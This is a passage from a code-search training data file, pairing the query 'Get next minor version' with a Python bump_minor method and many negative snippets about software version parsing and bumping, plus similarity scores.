resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def minor_version(self) -> str:\n return pulumi.get(self, \"minor_version\")", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def get_major_version(version):\n parsed_version = version.split('.')\n return '.'.join(parsed_version[0:2])", "def _next_version(self, dirpath: str) -> int:\n try:\n version_re = re.compile(r\"version_(\\d+)\")\n\n def is_valid_version(v: str):\n return version_re.search(v) is not None\n\n versions = tuple(filter(is_valid_version, os.listdir(dirpath)))\n if not versions:\n # No versions yet\n return 0\n current_version = natsorted(versions, reverse=True)[0]\n # Get the version number using the version pattern\n current_version = int(version_re.search(current_version).group(1))\n return current_version + 1\n except Exception as e:\n logger.warning(f\"Starting from version 0 because of error: {e}\")\n return 0", "def _getVersionMajor(self):\n return int(self.model.getroot().attrib['versionMajor'])", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_version():\n return '%d.%d.%d' % version_info", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def version_max():\n return VERSION_MAX", "def minimum_engine_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"minimum_engine_version\")", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def minor_version(self):\n return self.unpack_dword(0x18)", "def get_min_build_version(version: str) -> str:\n return Version(version).replace(micro=0).get_stable().dumps()", "def get_ilo_firmware_version_as_major_minor(self):\n try:\n manager, reset_uri = self._get_ilo_details()\n ilo_fw_ver_str = (\n manager['Oem']['Hp']['Firmware']['Current']['VersionString']\n )\n return common.get_major_minor(ilo_fw_ver_str)\n except Exception:\n return None", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def current_master_version(self) -> str:\n return pulumi.get(self, \"current_master_version\")", "def browser_version_major(self):\n # type: () -> string_types\n return self._browser_version_major", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def get_uni_version(self):\n version, major_version = None, None\n response = self.get_resource(category=VERSION, no_version=True)\n if response and response.get('version'):\n version = response['version']\n version_list = version.split('.')\n major_version = version_list[0][1:] + version_list[1]\n return version, major_version", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def commcare_minor_release(self):\n return '%d.%d' % self.build_spec.minor_release()", "def version_number() -> int:\n return 0", "def version(self):\n return \"%d.%d\" % (self._vmajor, self._vminor)", "def version():\n return '%d.%d' % (sys.version_info[0], sys.version_info[1])", "def getCurrentVersion():\n f_version = configManagement.currentVersion()\n return f_version", "def get_stable(self: _R) -> _R:\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def latestidd():\n pth, _ = run_functions.install_paths(\n version=\"8.8.0\"\n ) # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith(\"EnergyPlus\")]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def get_version():\n major=c_int_t(0)\n minor=c_int_t(0)\n patch=c_int_t(0)\n safe_call(backend.get().af_get_version(c_pointer(major), c_pointer(minor), c_pointer(patch)))\n return major.value,minor.value,patch.value", "def semver():\n return \".\".join([str(v) for v in VERSION])", "def getversion():\n major_ = ctypes.c_int32()\n minor_ = ctypes.c_int32()\n revision_ = ctypes.c_int32()\n res = __library__.MSK_XX_getversion(ctypes.byref(major_),ctypes.byref(minor_),ctypes.byref(revision_))\n if res != 0:\n raise Error(rescode(res),Env.getcodedesc(rescode(res))[1])\n major_ = major_.value\n _major_return_value = major_\n minor_ = minor_.value\n _minor_return_value = minor_\n revision_ = revision_.value\n _revision_return_value = revision_\n return (_major_return_value,_minor_return_value,_revision_return_value)", "def get_version():\n return '.'.join(map(str, VERSION))", "def get_current_version(self) -> str:\n raise NotImplementedError()", "def get_version():\r\n return __version__", "def latestidd():\n pth, _ = run_functions.install_paths(version='8.8.0') # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith('EnergyPlus')]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def parse_version_major(bin_path):\n version = parse_version(bin_path)\n return int(version.split(\".\")[0]) if version else None", "def get_major_dot_minor_version(version):\n return '.'.join([str(v) for v in version[:2]])", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def get_version(self):\r\n\r\n return self.versions[0].number", "def version_major_minor(version_string):\n return '.'.join(version_string.split('.')[0:2])", "def get_version():\n return \"4.{}\".format(__version__)", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return harmony.__version__", "def _getMajorMinorVersion( self, sVersion ):\n\n\t\ttry:\n\t\t\trgs = sVersion.split( '.' )\n\t\t\tif len( rgs ) == 2:\n\t\t\t\treturn sVersion\n\n\t\t\treturn rgs[ 0 ] + '.' + rgs[ 1 ]\n\n\t\texcept Exception, e:\n\t\t\terrMsg( 'error getting major.minor version' )\n\t\t\terrMsg( e )\n\t\t\treturn ''", "def get_install_requires_version():\n require_str = \"pyscaffold>={major}.{minor}a0,<{next_major}.0a0\"\n major, minor, *rest = (parse_version(pyscaffold_version)\n .base_version.split('.'))\n next_major = int(major) + 1\n return require_str.format(major=major, minor=minor, next_major=next_major)", "def fpga_major():\n return int, None", "def operatingsystem_version_major(self):\n # type: () -> string_types\n return self._operatingsystem_version_major", "async def version(self):\n self.do(\"version\")\n return (await self.read(7)).strip()", "def test_major(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[0] = int(new_version_parts[0]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is False", "def minimum_engine_version(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"minimum_engine_version\")", "def version():\n return uname().version", "def version():\n return uname().version", "def get_major_version(version, separator=\".\"):\n major = version.split(separator)[0]\n if not major.isdigit():\n raise ValueError(\"Major version must be numerical\")\n return \"{0}{1}0{1}0\".format(major, separator)", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def version_minor(self):\n assert self._version_patch != NotImplemented\n return self._version_patch", "def api_version() -> APIVersion:\n return MAX_SUPPORTED_VERSION", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def get_helm_major_version():\n client_helm_cmd = [\"helm\", \"version\", \"-c\", \"--short\"]\n client_version = (\n subprocess.check_output(client_helm_cmd).decode(\"utf-8\")\n )\n\n helm_version_major = client_version.split(\".\")[0]\n\n if \"Client:\" in helm_version_major:\n helm_version_major = helm_version_major.split(\":\")[-1].strip()\n\n return helm_version_major", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def Hello(self):\n version = '1.5.3'\n print 'returned version number', version\n return version", "def bump_minor(self: _R, inc: int = 1) -> _R:\n if not self.is_stable and self.micro == 0:\n return self.get_stable().bump_minor(inc - 1)\n\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor + inc, 0),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def find_xcode_major_version():\n cmd = ['xcodebuild', '-version']\n command_trace.log(cmd)\n\n result = str(subprocess.check_output(cmd))\n version = result.split('\\n', 1)[0]\n version = re.sub(r'Xcode ', '', version)\n version = re.sub(r'\\..*', '', version)\n return int(version)", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def query_version(self):\n return self.connection.cursor().execute('SELECT version()').fetchone()[0]", "def test_major(self):\n self.assertEqual(\"0\", self._version1.major())\n self.assertEqual(\"1.2\", self._version2.major())", "def get_version():\n return magpy.get_version()", "def get_current_version(self):\n current_version = self.get_version(self.get_module_and_path(self._main_dir))\n return current_version" ]
[ "0.82029897", "0.7808802", "0.72779334", "0.71113545", "0.7102261", "0.702806", "0.69866174", "0.69342357", "0.6925223", "0.69188356", "0.6805731", "0.67799294", "0.6777864", "0.66487956", "0.6535175", "0.6533176", "0.6531343", "0.65151787", "0.6488693", "0.6478734", "0.6450406", "0.64389133", "0.6403514", "0.6397337", "0.63150984", "0.63063884", "0.6301425", "0.62677336", "0.6260517", "0.6254892", "0.62528235", "0.6210452", "0.6187552", "0.6166631", "0.6164366", "0.6121601", "0.61165035", "0.6115675", "0.60939026", "0.6086578", "0.6059126", "0.6029422", "0.60282934", "0.6026213", "0.6024582", "0.6005794", "0.5987706", "0.59840506", "0.5980633", "0.597934", "0.59762996", "0.5965682", "0.5954565", "0.5954387", "0.5954333", "0.59402084", "0.5929863", "0.5925896", "0.5918963", "0.59142137", "0.5899568", "0.5877947", "0.5877497", "0.5864922", "0.5850008", "0.5839436", "0.58373153", "0.58373153", "0.58373153", "0.5836612", "0.58305985", "0.5821922", "0.5813012", "0.581116", "0.5799678", "0.57976216", "0.57951117", "0.57875276", "0.57875276", "0.5786065", "0.57668364", "0.57668364", "0.57564086", "0.57528764", "0.5739582", "0.5732839", "0.5728381", "0.5727705", "0.572474", "0.572241", "0.5719349", "0.5717118", "0.57134646", "0.57116854", "0.5709893", "0.5705343", "0.5704035", "0.57034844", "0.5700886", "0.56869435" ]
0.63819283
24
Get next minor version.
def bump_minor(self: _R, inc: int = 1) -> _R: if not self.is_stable and self.micro == 0: return self.get_stable().bump_minor(inc - 1) return self._replace( BaseVersion( epoch=0, release=(self.major, self.minor + inc, 0), pre=None, post=None, dev=None, local=None, ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def minor_version(self) -> str:\n return pulumi.get(self, \"minor_version\")", "def minor_version(self):\n return self.unpack_dword(0x18)", "def _getVersionMinor(self):\n return int(self.model.getroot().attrib['versionMinor'])", "def version_minor(self):\n assert self._version_patch != NotImplemented\n return self._version_patch", "def commcare_minor_release(self):\n return '%d.%d' % self.build_spec.minor_release()", "def version_max():\n return VERSION_MAX", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_ilo_firmware_version_as_major_minor(self):\n try:\n manager, reset_uri = self._get_ilo_details()\n ilo_fw_ver_str = (\n manager['Oem']['Hp']['Firmware']['Current']['VersionString']\n )\n return common.get_major_minor(ilo_fw_ver_str)\n except Exception:\n return None", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def operatingsystem_version_minor(self):\n # type: () -> string_types\n return self._operatingsystem_version_minor", "def browser_version_minor(self):\n # type: () -> string_types\n return self._browser_version_minor", "def fpga_minor():\n return int, None", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def version(self):\n return \"%d.%d\" % (self._vmajor, self._vminor)", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"auto_minor_version_upgrade\")", "def test_release_update_available_MINOR(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def latestidd():\n pth, _ = run_functions.install_paths(\n version=\"8.8.0\"\n ) # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith(\"EnergyPlus\")]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def latest_version(self):\n from leonardo_system.pip import check_versions\n return check_versions(True).get(self.name, None).get('new', None)", "def latestidd():\n pth, _ = run_functions.install_paths(version='8.8.0') # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith('EnergyPlus')]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def _getMajorMinorVersion( self, sVersion ):\n\n\t\ttry:\n\t\t\trgs = sVersion.split( '.' )\n\t\t\tif len( rgs ) == 2:\n\t\t\t\treturn sVersion\n\n\t\t\treturn rgs[ 0 ] + '.' + rgs[ 1 ]\n\n\t\texcept Exception, e:\n\t\t\terrMsg( 'error getting major.minor version' )\n\t\t\terrMsg( e )\n\t\t\treturn ''", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def test_minor(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[1] = int(new_version_parts[1]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def minor_version_auto_upgrade(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"minor_version_auto_upgrade\")", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def get_version():\n return 1", "def get_major_version(version):\n return str(check_version(version)[0])", "def major_version(self) -> str:\n return pulumi.get(self, \"major_version\")", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def minor_version(self, minor_version):\n\n self._minor_version = minor_version", "def minor_version(self, minor_version):\n\n self._minor_version = minor_version", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def get_version():\n click.echo(get_current_version_number())", "def get_version():\n return '%d.%d.%d' % version_info", "def version_min():\n return VERSION_MIN", "def get_runtime_minor_version(deps_path):\n with open(deps_path, 'r') as src:\n content = json.load(src)\n try:\n libraries = content['libraries']\n for key in libraries:\n if key.lower().startswith(NETCORE_APP_PREFIX):\n version = key[len(NETCORE_APP_PREFIX):]\n return version.split('-')[0]\n except KeyError:\n return None", "def test_minor(self):\n self.assertEqual(1, self._version1.minor())\n self.assertEqual(3, self._version2.minor())", "def get_version(self):\r\n\r\n return self.versions[0].number", "def version_major_minor(version_string):\n return '.'.join(version_string.split('.')[0:2])", "def major_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"major_version\")", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def get_host_os_sub_minor(self):\n\t\treturn call_sdk_function('PrlSrvCfg_GetHostOsSubMinor', self.handle)", "def major_version(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"major_version\")", "def major_version(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"major_version\")", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def _next_version(self, dirpath: str) -> int:\n try:\n version_re = re.compile(r\"version_(\\d+)\")\n\n def is_valid_version(v: str):\n return version_re.search(v) is not None\n\n versions = tuple(filter(is_valid_version, os.listdir(dirpath)))\n if not versions:\n # No versions yet\n return 0\n current_version = natsorted(versions, reverse=True)[0]\n # Get the version number using the version pattern\n current_version = int(version_re.search(current_version).group(1))\n return current_version + 1\n except Exception as e:\n logger.warning(f\"Starting from version 0 because of error: {e}\")\n return 0", "def get_latest_version(model: str) -> str:\n if model in {\"small\", \"medium\", \"large\"}:\n model = f\"da_dacy_{model}_trf\"\n versions = [mdl.split(\"-\")[-1] for mdl in models_url if mdl.startswith(model)]\n versions = sorted(\n versions,\n key=lambda s: [int(u) for u in s.split(\".\")],\n reverse=True,\n )\n return versions[0]", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def get_host_os_minor(self):\n\t\treturn call_sdk_function('PrlSrvCfg_GetHostOsMinor', self.handle)", "def getversion():\n major_ = ctypes.c_int32()\n minor_ = ctypes.c_int32()\n revision_ = ctypes.c_int32()\n res = __library__.MSK_XX_getversion(ctypes.byref(major_),ctypes.byref(minor_),ctypes.byref(revision_))\n if res != 0:\n raise Error(rescode(res),Env.getcodedesc(rescode(res))[1])\n major_ = major_.value\n _major_return_value = major_\n minor_ = minor_.value\n _minor_return_value = minor_\n revision_ = revision_.value\n _revision_return_value = revision_\n return (_major_return_value,_minor_return_value,_revision_return_value)", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def major_version(self):\n return self.unpack_dword(0x14)", "def api_version() -> APIVersion:\n return MAX_SUPPORTED_VERSION", "def get_major_dot_minor_version(version):\n return '.'.join([str(v) for v in version[:2]])", "def latest_version(self) -> AwesomeVersion | None:\n return self.sys_updater.version_cli", "def find_latest_version(versions):\n\n highest_version = 0\n for version in versions:\n version = parse_version(version)\n\n if version > highest_version:\n highest_version = version\n\n return highest_version", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def version_number() -> int:\n return 0", "def get_version():\n return magpy.get_version()", "def get_latest_build(self):\n # Retrieve last sanity-checked build number (could be 0)\n self.get_last_sanity()\n\n # * List all build numbers for this version. Note this may include\n # builds for other versions, since all versions for a given\n # release share a build directory.\n # * Ignore builds above 50000, which are toy builds\n\n builds = [int(x) for x in os.listdir(self.ver_dir)\n if x.isdigit() and int(x) > self.last_bld and int(x) < 50000]\n builds.sort()\n\n # Check each build after last sanity-checked build\n bld_num = self.last_bld\n for build in builds:\n print (\"Checking build \" + str(build))\n if self.check_build(build):\n bld_num = build\n print(\"bld_num is now \" + str(bld_num))\n return bld_num", "def _major_version(self):\n version_tuple = StrictVersion(self.plugin.version).version\n major = '.'.join(map(str, version_tuple[:2]))\n\n return major", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def get_latest_ml_pipeline_version() -> str:\n\n return execute_query('''\n SELECT pipeline_version\n FROM ml_pipeline\n ORDER BY created_at DESC\n LIMIT 1\n ''')[0][0]", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def getCurrentVersion():\n f_version = 